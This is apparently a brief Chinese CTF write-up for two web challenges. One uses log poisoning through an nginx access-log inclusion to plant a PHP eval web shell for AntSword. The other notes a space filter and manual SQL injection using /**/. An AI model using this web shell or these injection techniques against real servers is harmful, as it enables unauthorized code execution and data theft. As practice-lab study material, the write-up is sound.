文章目录 web 4日志注入 web6 web 4 日志注入 查看日志 ?url=/var/log/nginx/access.log 进行日志注入 <?php @eval($_POST['a']);?> 蚂蚁剑连接 web6 这里先fuzz一下,发现 这里发现单纯的空格不会被过滤,然而字符后面加空格会被过滤,这是aaa 是aaa空格。 这里select和/**/没有被过滤,这里常规手注就好了。